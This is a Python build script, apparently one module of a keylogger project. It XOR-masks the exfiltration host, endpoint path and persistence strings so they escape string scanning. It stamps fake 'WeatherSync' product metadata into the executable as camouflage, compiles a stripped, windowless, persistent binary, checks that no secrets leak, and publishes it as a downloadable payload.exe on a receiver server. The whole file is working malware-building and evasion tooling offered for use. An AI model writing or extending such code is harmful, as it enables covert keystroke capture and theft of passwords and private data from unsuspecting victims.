#!/usr/bin/env python3
"""Module 2 — obfuscator / build driver for the keylogger.

Steps:
  1. Load config.json (falls back to config.example.json values, generating a
     fresh PSK and writing config.json so the same key is reused next build).
  2. Emit src/gen_strings.h: every sensitive string XOR-masked with a
     per-build, per-string random key. Defeats `strings` on the binary.
  3. Render res/template.rc with fake product metadata; windres it.
  4. Compile with gcc (symbols stripped, static, window subsystem).
  5. Self-check the exe: no plaintext config values in ASCII or UTF-16LE,
     no COFF symbol table, sane size.
  6. Copy the exe to ../receiver/public/payload.exe.

Run from the keylogger/ directory with MSYS2 MinGW-w64 (gcc/windres) on PATH.
"""

import json
import os
import shutil
import struct
import subprocess
import sys

from pathlib import Path
from secrets import token_bytes, token_hex

HERE = Path(__file__).resolve().parent
SRC = HERE / "src"
RES = HERE / "res"
OUT = HERE / "out"
CONFIG = HERE / "config.json"
EXAMPLE = HERE / "config.example.json"
GEN = SRC / "gen_strings.h"
RC_TEMPLATE = RES / "template.rc"
RC_GENERATED = RES / "generated.rc"
RC_OBJECT = RES / "version_res.o"
RECEIVER_PAYLOAD = HERE.parent / "receiver" / "public" / "payload.exe"

USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WeatherSync/1.0"

SOURCES = ["main.c", "capture.c", "buffer.c", "crypto.c", "net.c", "util.c",
          "config.c"]


def die(msg: str) -> None:
    print(f"build.py: {msg}", file=sys.stderr)
    sys.exit(1)


def load_config() -> dict:
    if CONFIG.exists():
        cfg = json.loads(CONFIG.read_text())
    elif EXAMPLE.exists():
        cfg = json.loads(EXAMPLE.read_text())
    else:
        die("no config.json or config.example.json found")

    required = ["endpoint_host", "endpoint_path", "file_name", "company",
                "product_name", "version"]
    missing = [k for k in required if k not in cfg]
    if missing:
        die(f"config missing keys: {missing}")

    cfg.setdefault("persist", True)
    cfg.setdefault("allow_http_local", False)
    cfg.setdefault("local_port", 3000)
    cfg.setdefault("capture_injected", False)  # test builds only: capture SendKeys/SendInput
    cfg.setdefault("debug_console", False)     # test builds only: console + tick diagnostics
    cfg.setdefault("app_dir", "Northlane")
    cfg.setdefault("mutex_name", "Global\\NorthlaneWeatherSync")
    cfg.setdefault("run_value", cfg["file_name"].removesuffix(".exe"))

    if not cfg.get("psk_hex"):
        cfg["psk_hex"] = token_hex(32)  # 32 bytes -> 64 hex chars
        print(f"generated new PSK (set it as Vercel env KEYLOGGER_PSK): "
              f"{cfg['psk_hex']}")
        CONFIG.write_text(json.dumps(cfg, indent=2) + "\n")
        print(f"wrote {CONFIG} (keep this file out of git)")

    if len(bytes.fromhex(cfg["psk_hex"])) != 32:
        die("psk_hex must be 64 hex chars (32 bytes)")
    return cfg


def c_array(name: str, data: bytes) -> str:
    toks = [f"0x{b:02x}" for b in data]
    lines = ",\n ".join(",".join(toks[i:i + 16]) for i in range(0, len(toks), 16))
    return f"static const unsigned char {name}[] = {{\n {lines}}};\n"


def emit_gen_strings(cfg: dict) -> None:
    strings = {
        "HOST": cfg["endpoint_host"].encode(),
        "PATH": cfg["endpoint_path"].encode(),
        "UA": USER_AGENT.encode(),
        "MUTEX": cfg["mutex_name"].encode(),
        "APPDIR": cfg["app_dir"].encode(),
        "RUNVAL": cfg["run_value"].encode(),
        "EXEFILE": cfg["file_name"].encode(),
    }
    psk = bytes.fromhex(cfg["psk_hex"])

    lines = [
        "// Generated by build.py — do not edit. XOR-masked config blobs:",
        "// plaintext[i] = data[i] ^ mask[i].",
        "#ifndef GEN_STRINGS_H",
        "#define GEN_STRINGS_H",
        "",
        f"#define CFG_PERSIST {1 if cfg['persist'] else 0}",
        f"#define CFG_ALLOW_HTTP_LOCAL {1 if cfg['allow_http_local'] else 0}",
        f"#define CFG_LOCAL_PORT {cfg['local_port']}",
        f"#define CFG_CAPTURE_INJECTED {1 if cfg['capture_injected'] else 0}",
        f"#define CFG_DEBUG_CONSOLE {1 if cfg['debug_console'] else 0}",
        "",
    ]
    for name, plain in strings.items():
        mask = token_bytes(len(plain))
        data = bytes(p ^ m for p, m in zip(plain, mask))
        lines.append(f"#define GEN_{name}_LEN {len(plain)}")
        lines.append(c_array(f"GEN_{name}_DATA", data))
        lines.append(c_array(f"GEN_{name}_MASK", mask))
    psk_mask = token_bytes(32)
    psk_data = bytes(p ^ m for p, m in zip(psk, psk_mask))
    lines.append(c_array("GEN_PSK_DATA", psk_data))
    lines.append(c_array("GEN_PSK_MASK", psk_mask))
    lines.append("#endif")

    GEN.write_text("\n".join(lines))
    print(f"wrote {GEN.name} ({len(strings)} strings + PSK, masked)")


def render_rc(cfg: dict) -> None:
    parts = cfg["version"].split(".")
    while len(parts) < 4:
        parts.append("0")
    fileversion = ",".join(parts[:4])

    template = RC_TEMPLATE.read_text()
    rc = (template
          .replace("{{FILEVERSION}}", fileversion)
          .replace("{{COMPANY}}", cfg["company"])
          .replace("{{PRODUCT}}", cfg["product_name"])
          .replace("{{VERSION}}", cfg["version"])
          .replace("{{FILE}}", cfg["file_name"]))
    RC_GENERATED.write_text(rc)
    print(f"wrote {RC_GENERATED.name}")


def run(cmd: list[str]) -> None:
    print("+", " ".join(cmd))
    proc = subprocess.run(cmd, cwd=HERE, capture_output=True, text=True)
    if proc.returncode != 0:
        print(proc.stdout)
        print(proc.stderr, file=sys.stderr)
        die(f"command failed: {cmd[0]}")


def compile_exe(cfg: dict) -> Path:
    OUT.mkdir(exist_ok=True)
    exe = OUT / cfg["file_name"]

    run(["windres", str(RC_GENERATED), str(RC_OBJECT)])

    subsystem = "-mconsole" if cfg.get("debug_console") else "-mwindows"
    cmd = (["gcc", "-O2", "-s", "-municode", subsystem, "-static",
            "-Wall", "-Wextra", "-Isrc"]
           + [f"src/{s}" for s in SOURCES]
           + [str(RC_OBJECT)]
           + ["-lwinhttp", "-lbcrypt", "-ladvapi32", "-luser32"]
           + ["-o", str(exe)])
    run(cmd)
    return exe


def check_exe(exe: Path, cfg: dict) -> None:
    raw = exe.read_bytes()

    # COFF symbol table pointer must be zero (fully stripped).
    pe_off = struct.unpack_from("<I", raw, 0x3C)[0]
    if raw[pe_off:pe_off + 4] != b"PE\x00\x00":
        die("not a PE file?")
    symtab = struct.unpack_from("<I", raw, pe_off + 4 + 8)[0]
    if symtab != 0:
        die(f"symbol table present at 0x{symtab:x} — strip failed")

    # No plaintext secrets in ASCII or UTF-16LE. Product name / company /
    # app_dir are branding, deliberately visible in the VERSIONINFO resource
    # (that's the camouflage), and "localhost" is a common library string, so
    # none of those are useful needles.
    secrets = [cfg["psk_hex"]]
    if cfg["endpoint_host"].lower() != "localhost":
        secrets.append(cfg["endpoint_host"])
    if len(cfg["endpoint_path"]) > 4:
        secrets.append(cfg["endpoint_path"])
    for text in secrets:
        for enc in ("ascii", "utf-16-le"):
            if text.encode(enc) in raw:
                die(f"plaintext {enc} {text!r} found in {exe.name}")
    if bytes.fromhex(cfg["psk_hex"]) in raw:
        die("raw PSK bytes found in exe (masking broken)")

    size = len(raw)
    if not (15_000 < size < 2_000_000):
        die(f"suspicious exe size: {size}")
    print(f"self-check ok: no plaintext secrets, no symbols, {size:,} bytes")


def main() -> None:
    cfg = load_config()
    emit_gen_strings(cfg)
    render_rc(cfg)
    exe = compile_exe(cfg)
    check_exe(exe, cfg)

    RECEIVER_PAYLOAD.parent.mkdir(exist_ok=True)
    shutil.copy2(exe, RECEIVER_PAYLOAD)
    print(f"copied {exe.name} -> {RECEIVER_PAYLOAD}")
    print("done. Next: set KEYLOGGER_PSK / LOGS_TOKEN on Vercel, then deploy.")


if __name__ == "__main__":
    main()
